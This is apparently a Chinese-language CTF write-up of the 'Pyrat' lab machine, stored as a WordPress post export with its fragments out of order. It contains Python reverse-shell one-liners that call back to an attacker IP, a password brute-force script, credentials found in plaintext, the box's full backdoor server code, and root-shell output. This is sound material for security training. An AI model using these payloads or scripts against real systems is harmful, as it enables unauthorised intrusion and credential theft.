args=(password,))\n thread.start()\n threads.append(thread)\n if len(threads) >= 30:\n for thread in threads:\n thread.join()\n threads = []<\/code><\/pre>\n\u6309\u7167\u4f5c\u8005\u7684\u610f\u601d\uff0c\u4fee\u6539\u4e00\u4e0b\u5c31\u53ef\u4ee5\u7206\u7834\u51fa\u6765\u7684\uff0c\u4f46\u662f\u6211\u6ca1\u641e\u51fa\u6765\uff0c\u7206\u7834\u51fa\u6765\u662f\uff1a<\/p>\n
admin\nseptember<\/code><\/pre>\n\u7206\u7834\u51fa\u6765\u4ee5\u540e\u5c1d\u8bd5\u8fde\u63a5\u83b7\u53d6rootshell:<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/pyrat]\n\u2514\u2500# nc 192.168.0.179 8000\nadmin\nPassword:\nseptember\nWelcome Admin!!! Type "shell" to begin\nshell\n# whoami;id\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n# ls -la\nls -la\ntotal 68\ndrwxrwx--- 7 root root 4096 Jan 4 08:32 .\ndrwxr-xr-x 18 root root 4096 Dec 22 13:22 ..\nlrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> \/dev\/null\n-rwxrwx--- 1 root root 3230 Jun 21 2023 .bashrc\ndrwx------ 2 root root 4096 Jun 21 2023 .cache\ndrwx------ 3 root root 4096 Dec 22 14:21 .config\n-rw-r--r-- 1 root root 29 Jun 21 2023 .gitconfig\ndrwxr-xr-x 3 root root 4096 Jan 4 08:32 .local\n-rwxrwx--- 1 root root 161 Dec 5 2019 .profile\n-rwxrwx--- 1 root root 5340 Dec 22 14:49 pyrat.py\n-rw-r----- 1 root root 33 Jun 15 2023 root.txt\n-rw-r--r-- 1 root root 75 Jun 15 2023 .selected_editor\ndrwxrwx--- 3 root root 4096 Jun 2 2023 snap\ndrwxrwx--- 2 root root 4096 Jun 2 2023 .ssh\n-rw-rw-rw- 1 root root 9204 Dec 22 14:49 .viminfo\n# cat root.txt\ncat root.txt\nba5ed03e9e74bb98054438480165e221\n# cat pyrat.py\ncat pyrat.py\nimport socket\nimport threading\nimport sys\nfrom io import StringIO\nimport datetime\nimport os\nimport getpass\nimport multiprocessing\n\nmanager = multiprocessing.Manager()\nadmins = manager.list()\n\ndef handle_client(client_socket, client_address):\n uid = os.getuid()\n uid_changed = False\n\n while True:\n # Receive data from the client\n try:\n data = client_socket.recv(1024).decode("utf-8")\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n continue\n\n if not data:\n continue\n\n if is_http(data):\n send_data(client_socket, fake_http())\n continue\n\n switch_case(client_socket, str(data).strip())\n\n # Close the connection with the client\n remove_socket(client_socket)\n\ndef switch_case(client_socket, data):\n if data == 'admin':\n get_admin(client_socket)\n else:\n # Check socket is admin and downgrade if is not aprooved\n uid = os.getuid()\n if (uid == 0) and (str(client_socket) not in admins):\n change_uid()\n\n if data == 'shell':\n shell(client_socket)\n else:\n exec_python(client_socket, data)\n\n# Tries to execute the random data with Python\ndef exec_python(client_socket, data):\n try:\n # Redirect stdout to capture the printed output\n captured_output = StringIO()\n sys.stdout = captured_output\n\n # Execute the received data as code\n exec(data)\n\n # Get the captured output\n exec_output = captured_output.getvalue()\n\n # Send the result back to the client\n send_data(client_socket, exec_output)\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n finally:\n # Reset stdout to the default\n sys.stdout = sys.__stdout__\n\n# Handles the Admin endpoint\ndef get_admin(client_socket):\n global admins\n\n uid = os.getuid()\n if (uid != 0):\n send_data(client_socket, "Start a fresh client to begin.")\n return\n\n password = 'september'\n\n for i in range(0, 3):\n # Ask for Password\n send_data(client_socket, "Password:")\n\n # Receive data from the client\n try:\n data = client_socket.recv(1024).decode("utf-8")\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n pass\n finally:\n # Reset stdout to the default\n sys.stdout = sys.__stdout__\n\n if data.strip() == password:\n admins.append(str(client_socket))\n send_data(client_socket, 'Welcome Admin!!! Type "shell" to begin')\n break\n\ndef shell(client_socket):\n try:\n import pty\n os.dup2(client_socket.fileno(), 0)\n os.dup2(client_socket.fileno(), 1)\n os.dup2(client_socket.fileno(), 2)\n pty.spawn("\/bin\/sh")\n except Exception as e:\n send_data(client_socket, e)\n\n# Sends data to the clients\ndef send_data(client_socket, data):\n try:\n client_socket.sendall((str(data) + '\\n').encode("utf-8"))\n except:\n remove_socket(client_socket)\n\ndef start_server(host, port):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind((host, port))\n server_socket.listen(5)\n print(f"Server listening on {host}:{port}...")\n\n while True:\n client_socket, client_address = server_socket.accept()\n # Start a new process to handle the client\n p = multiprocessing.Process(target=handle_client, args=(client_socket, client_address))\n p.start()\n\ndef remove_socket(client_socket):\n client_socket.close()\n global admins\n\n # Replace the original and admins lists\n admins = admins._getvalue()\n\n try:\n if str(client_socket) in admins:\n admins.remove(str(client_socket))\n except:\n pass\n\n# Check if the received data is an HTTP request\ndef is_http(data):\n if ('HTTP' in data) and ('Host:' in data):\n return True\n return False\n\n# Sends a fake Python HTTP Server Banner\ndef fake_http():\n try:\n # Get the current date and time\n current_datetime = datetime.datetime.now()\n\n # Format the date and time according to the desired format\n formatted_datetime = current_datetime.strftime("%a %b %d %H:%M:%S %Z %Y")\n banner = """\nHTTP\/1.0 200 OK\nServer: SimpleHTTP\/0.6 Python\/3.11.2\nDate: {date}""".format(date=formatted_datetime) + """\nContent-type: text\/html; charset=utf-8\nContent-Length: 27\n\nTry a more basic connection!\n"""\n return banner[1:]\n except:\n return 'HTTP\/1.0 200 OK'\n\ndef change_uid():\n uid = os.getuid()\n\n if uid == 0:\n # Make python code execution run as user 33 (www-data)\n euid = 33\n groups = os.getgroups()\n if 0 in groups:\n groups.remove(0)\n os.setgroups(groups)\n os.setgid(euid)\n os.setuid(euid)\n\n# MAIN\nif __name__ == "__main__":\n host = "0.0.0.0" # Replace with your desired IP address\n port = 8000 # Replace with your desired port number\n\n try:\n start_server(host, port)\n except KeyboardInterrupt:\n print('Shutting Down...')\n sys.exit(1)<\/code><\/pre>\n\u7f16\u5199\u811a\u672c<\/h2>\n
\u6211\u54a8\u8be2\u4e86\u4e00\u4e0brpj7<\/code>\u5e08\u5085\uff1a<\/p>\nimport socket\n\nHOST = "10.0.0.108" # Server ip address\nPORT = 8000 # The port used by the server\n\ndef connectdostuff(fndata):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b"admin\\n")\n data = s.recv(1024)\n s.sendall(bytes(fndata+"\\n",encoding="ascii"))\n data = s.recv(1024)\n s.close()\n print(f" {data!r}")\n\nfile1 = open('\/usr\/share\/wordlists\/metasploit\/unix_passwords.txt', 'r')\nLines = file1.readlines()\ncount=0\nfor line in Lines:\n count += 1\n print("Line{}: {}".format(count, line.strip()))\n connectdostuff(line)<\/code><\/pre>\n\u6b63\u5e38\u7684\u7a0b\u5e8f\u5e94\u7b54\u5e94\u8be5\u662f\u8fd9\u6837\u7684\uff1a<\/p>\n
<\/div><\/p>\n\u6211\u5c1d\u8bd5\u4f7f\u7528python\u7684pwntools\u5e93\u8fdb\u884c\u8fde\u63a5\u7206\u7834\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002rpj7<\/code>\u5e08\u5085\u7684\u811a\u672c\u5012\u662f\u8f7b\u800c\u6613\u4e3e\u5c31\u8fd0\u884c\u6210\u529f\u4e86\u3002<\/p>\n<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"Pyrat \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p 1-65535 172.20.10.13 PORT […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-580","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=580"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions"}],"predecessor-version":[{"id":581,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions\/581"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
nmap -sCV -p 1-65535 172.20.10.13<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n8000\/tcp open http-alt SimpleHTTP\/0.6 Python\/3.11.2\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\n|_http-server-header: SimpleHTTP\/0.6 Python\/3.11.2\n| fingerprint-strings: \n| DNSStatusRequestTCP, DNSVersionBindReqTCP, LANDesk-RC, Socks4, X11Probe: \n| source code string cannot contain null bytes\n| FourOhFourRequest, LPDString, SIPOptions: \n| invalid syntax (<string>, line 1)\n| GetRequest: \n| name 'GET' is not defined\n| HTTPOptions, RTSPRequest: \n| name 'OPTIONS' is not defined\n| Help: \n| name 'HELP' is not defined\n| Kerberos: \n| 'utf-8' codec can't decode byte 0x81 in position 5: invalid start byte\n| LDAPBindReq: \n| 'utf-8' codec can't decode byte 0x80 in position 12: invalid start byte\n| LDAPSearchReq: \n| 'utf-8' codec can't decode byte 0x84 in position 1: invalid start byte\n| RPCCheck: \n| 'utf-8' codec can't decode byte 0x80 in position 0: invalid start byte\n| SMBProgNeg: \n| 'utf-8' codec can't decode byte 0xa4 in position 3: invalid start byte\n| SSLSessionReq: \n| 'utf-8' codec can't decode byte 0xd7 in position 13: invalid continuation byte\n| Socks5: \n| 'utf-8' codec can't decode byte 0x80 in position 5: invalid start byte\n| TLSSessionReq: \n| 'utf-8' codec can't decode byte 0xa7 in position 13: invalid start byte\n| TerminalServerCookie: \n|_ 'utf-8' codec can't decode byte 0xe0 in position 5: invalid continuation byte\n|_http-open-proxy: Proxy might be redirecting requests\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8000-TCP:V=7.94SVN%I=7%D=4\/1%Time=660A59F0%P=x86_64-pc-linux-gnu%r(\nSF:GenericLines,1,"\\n")%r(GetRequest,1A,"name\\x20'GET'\\x20is\\x20not\\x20def\nSF:ined\\n")%r(X11Probe,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x\nSF:20null\\x20bytes\\n")%r(FourOhFourRequest,22,"invalid\\x20syntax\\x20\\(<str\nSF:ing>,\\x20line\\x201\\)\\n")%r(Socks5,47,"'utf-8'\\x20codec\\x20can't\\x20deco\nSF:de\\x20byte\\x200x80\\x20in\\x20position\\x205:\\x20invalid\\x20start\\x20byte\\\nSF:n")%r(Socks4,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\\nSF:x20bytes\\n")%r(HTTPOptions,1E,"name\\x20'OPTIONS'\\x20is\\x20not\\x20define\nSF:d\\n")%r(RTSPRequest,1E,"name\\x20'OPTIONS'\\x20is\\x20not\\x20defined\\n")%r\nSF:(RPCCheck,47,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x80\\x20in\nSF:\\x20position\\x200:\\x20invalid\\x20start\\x20byte\\n")%r(DNSVersionBindReqT\nSF:CP,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:")%r(DNSStatusRequestTCP,2D,"source\\x20code\\x20string\\x20cannot\\x20cont\nSF:ain\\x20null\\x20bytes\\n")%r(Help,1B,"name\\x20'HELP'\\x20is\\x20not\\x20defi\nSF:ned\\n")%r(SSLSessionReq,4F,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\nSF:\\x200xd7\\x20in\\x20position\\x2013:\\x20invalid\\x20continuation\\x20byte\\n"\nSF:)%r(TerminalServerCookie,4E,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byt\nSF:e\\x200xe0\\x20in\\x20position\\x205:\\x20invalid\\x20continuation\\x20byte\\n"\nSF:)%r(TLSSessionReq,48,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x\nSF:a7\\x20in\\x20position\\x2013:\\x20invalid\\x20start\\x20byte\\n")%r(Kerberos,\nSF:47,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x81\\x20in\\x20positi\nSF:on\\x205:\\x20invalid\\x20start\\x20byte\\n")%r(SMBProgNeg,47,"'utf-8'\\x20co\nSF:dec\\x20can't\\x20decode\\x20byte\\x200xa4\\x20in\\x20position\\x203:\\x20inval\nSF:id\\x20start\\x20byte\\n")%r(LPDString,22,"invalid\\x20syntax\\x20\\(<string>\nSF:,\\x20line\\x201\\)\\n")%r(LDAPSearchReq,47,"'utf-8'\\x20codec\\x20can't\\x20d\nSF:ecode\\x20byte\\x200x84\\x20in\\x20position\\x201:\\x20invalid\\x20start\\x20by\nSF:te\\n")%r(LDAPBindReq,48,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x2\nSF:00x80\\x20in\\x20position\\x2012:\\x20invalid\\x20start\\x20byte\\n")%r(SIPOpt\nSF:ions,22,"invalid\\x20syntax\\x20\\(<string>,\\x20line\\x201\\)\\n")%r(LANDesk-\nSF:RC,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u5148\u8bbf\u95ee\u4e00\u4e0b\u5b83\u76848000<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u53d1\u6398\u4fe1\u606f\uff1a<\/p>\n<\/div><\/p>\n\u76f4\u63a5\u8fde\u63a5\u8bd5\u8bd5\uff1a<\/p>\n
nc 172.20.10.13 8000\nwhoami;id\nname 'whoami' is not defined\nhelp\n\n?\ninvalid syntax (<string>, line 1)\nls\nname 'ls' is not defined\n-V \nname 'V' is not defined\nimport pty;pty.spawn("\/bin\/bash")\ninvalid character in identifier (<string>, line 1)\nimport os<\/code><\/pre>\n\u770b\u6765\u53ef\u4ee5\u6267\u884cpython\u8bed\u53e5\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\u3002<\/p>\n
import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("172.20.10.8"),int(os.getenv("1234"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("\/bin\/sh")\n# int() argument must be a string, a bytes-like object or a number, not 'NoneType'<\/code><\/pre>\n\u6362\u4e00\u4e2a\uff1a<\/p>\n
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);<\/code><\/pre>\npwncat-cs -lp 1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@Pyrat:\/root$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@Pyrat:\/root$ ls -la\nls: cannot open directory '.': Permission denied\n(remote) www-data@Pyrat:\/root$ cd \/tmp\n(remote) www-data@Pyrat:\/tmp$ ls\npymp-tohv0yte\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-ModemManager.service-2N2sVh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-logind.service-fMUUzi\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-resolved.service-bXLClh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-timesyncd.service-3pF6Th\n(remote) www-data@Pyrat:\/tmp$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n(remote) www-data@Pyrat:\/tmp$ cd \/var\/www\/html\nbash: cd: \/var\/www\/html: No such file or directory\n(remote) www-data@Pyrat:\/tmp$ cd \/var\n(remote) www-data@Pyrat:\/var$ ls\nbackups cache crash lib local lock log mail opt run spool tmp\n(remote) www-data@Pyrat:\/var$ mail\nmail: cannot stat `\/root\/.mail': Permission denied\nmail: Cannot open `\/root\/.mailrc': Permission denied\nNo mail for www-data\n(remote) www-data@Pyrat:\/var$ cd backups\n(remote) www-data@Pyrat:\/var\/backups$ ls\napt.extended_states.0 apt.extended_states.1.gz\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nusbmux:x:111:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nthink:x:1000:1000:,,,:\/home\/think:\/bin\/bash\nfwupd-refresh:x:113:117:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\npostfix:x:114:119::\/var\/spool\/postfix:\/usr\/sbin\/nologin\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) www-data@Pyrat:\/var\/backups$ cd \/\n(remote) www-data@Pyrat:\/$ ls\nbin dev home lib32 libx32 media opt root sbin swap.img tmp var\nboot etc lib lib64 lost+found mnt proc run srv sys usr\n(remote) www-data@Pyrat:\/$ cd opt\n(remote) www-data@Pyrat:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Jun 21 2023 .\ndrwxr-xr-x 18 root root 4096 Dec 22 13:22 ..\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 dev\n(remote) www-data@Pyrat:\/opt$ cd dev\n(remote) www-data@Pyrat:\/opt\/dev$ ls -la\ntotal 12\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 .\ndrwxr-xr-x 3 root root 4096 Jun 21 2023 ..\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .git\n(remote) www-data@Pyrat:\/opt\/dev$ cd .git\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 branches\n-rw-rw-r-- 1 think think 21 Jun 21 2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think 296 Jun 21 2023 config\n-rw-rw-r-- 1 think think 73 Jun 21 2023 description\n-rw-rw-r-- 1 think think 23 Jun 21 2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 hooks\n-rw-rw-r-- 1 think think 145 Jun 21 2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21 2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21 2023 refs\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ cat config\n[core]\n repositoryformatversion = 0\n filemode = true\n bare = false\n logallrefupdates = true\n[user]\n name = Jose Mario\n email = josemlwdf@github.com\n\n[credential]\n helper = cache --timeout=3600\n\n[credential "https:\/\/github.com"]\n username = think\n password = _TH1NKINGPirate$_<\/code><\/pre>\n\u5207\u6362\u81f3think\u7528\u6237<\/h3>\n
\u65e0\u610f\u95f4\u627e\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5207\u6362\u7528\u6237<\/p>\n
think\n_TH1NKINGPirate$_<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nthink@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 branches\n-rw-rw-r-- 1 think think 21 Jun 21 2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think 296 Jun 21 2023 config\n-rw-rw-r-- 1 think think 73 Jun 21 2023 description\n-rw-rw-r-- 1 think think 23 Jun 21 2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 hooks\n-rw-rw-r-- 1 think think 145 Jun 21 2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21 2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21 2023 refs\nthink@Pyrat:\/opt\/dev\/.git$ sudo -l\n[sudo] password for think: \nSorry, user think may not run sudo on pyrat.\nthink@Pyrat:\/opt\/dev\/.git$ git log\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -> master)\nAuthor: Jose Mario <josemlwdf@github.com>\nDate: Wed Jun 21 09:32:14 2023 +0000\n\n Added shell endpoint\nthink@Pyrat:\/opt\/dev\/.git$ git show\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -> master)\nAuthor: Jose Mario <josemlwdf@github.com>\nDate: Wed Jun 21 09:32:14 2023 +0000\n\n Added shell endpoint\n\ndiff --git a\/pyrat.py.old b\/pyrat.py.old\nnew file mode 100644\nindex 0000000..ce425cf\n--- \/dev\/null\n+++ b\/pyrat.py.old\n@@ -0,0 +1,27 @@\n+...............................................\n+\n+def switch_case(client_socket, data):\n+ if data == 'some_endpoint':\n+ get_this_enpoint(client_socket)\n+ else:\n+ # Check socket is admin and downgrade if is not aprooved\n+ uid = os.getuid()\n+ if (uid == 0):\n+ change_uid()\n+\n+ if data == 'shell':\n+ shell(client_socket)\n+ else:\n+ exec_python(client_socket, data)\n+\n+def shell(client_socket):\n+ try:\n+ import pty\n+ os.dup2(client_socket.fileno(), 0)\n+ os.dup2(client_socket.fileno(), 1)\n+ os.dup2(client_socket.fileno(), 2)\n+ pty.spawn("\/bin\/sh")\n+ except Exception as e:\n+ send_data(client_socket, e\n+\n+...............................................\nthink@Pyrat:\/opt\/dev\/.git$ ps aux | grep "root"\n# \u4ec5\u5c55\u793a\u90e8\u5206\uff0c\u53d1\u73b0\u5927\u91cf\u7684pyrat\u3002\u3002\u3002\u3002\nroot 1506 1.3 0.5 22048 11584 ? R 06:56 0:20 python3 \/root\/pyrat.py\nwww-data 1519 1.3 0.5 22184 11952 ? R 06:59 0:17 python3 \/root\/pyrat.py\nroot 1553 0.0 0.0 0 0 ? I 07:01 0:00 [kworker\/0:1-events]\nwww-data 1575 0.0 0.6 22184 12368 ? S 07:04 0:00 python3 \/root\/pyrat.py\nroot 1614 0.0 0.0 0 0 ? I 07:09 0:00 [kworker\/u2:2-events_power_efficient]\nroot 1771 0.0 0.0 0 0 ? I 07:16 0:00 [kworker\/u2:1-events_power_efficient]\nroot 1797 0.0 0.1 8784 3992 pts\/0 S 07:17 0:00 su think\nroot 1817 0.0 0.0 0 0 ? I 07:17 0:00 [kworker\/0:0-events]\nroot 1865 0.0 0.0 0 0 ? I 07:21 0:00 [kworker\/u2:0-events_unbound]\nthink 1867 0.0 0.0 6432 660 pts\/0 S+ 07:21 0:00 grep --color=auto root<\/code><\/pre>\n\u731c\u6d4b\u662f\u6709\u4e9b\u5173\u8054\u7684\u3002<\/p>\n
\u8ba9chatgpt\u89e3\u8bfb\u4e00\u4e0b\uff1a<\/p>\n
def switch_case(client_socket, data):\n if data == 'some_endpoint':\n get_this_enpoint(client_socket)\n else:\n # Check if the socket is admin and downgrade if not approved\n uid = os.getuid()\n if uid == 0: # Check if the user is root\/administrator\n change_uid() # If yes, change to a non-administrator user\n\n if data == 'shell':\n shell(client_socket) # If the data is 'shell', invoke the shell function\n else:\n exec_python(client_socket, data) # Otherwise, execute Python code\n\ndef shell(client_socket):\n try:\n import pty\n os.dup2(client_socket.fileno(), 0) # Redirect standard input\n os.dup2(client_socket.fileno(), 1) # Redirect standard output\n os.dup2(client_socket.fileno(), 2) # Redirect standard error\n pty.spawn("\/bin\/sh") # Start a shell process\n except Exception as e:\n send_data(client_socket, e) # If an exception occurs, send the error message back to the 